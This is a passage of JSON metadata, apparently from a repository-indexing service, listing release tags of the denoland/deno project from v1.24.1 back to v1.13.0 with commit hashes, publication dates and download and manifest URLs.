/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms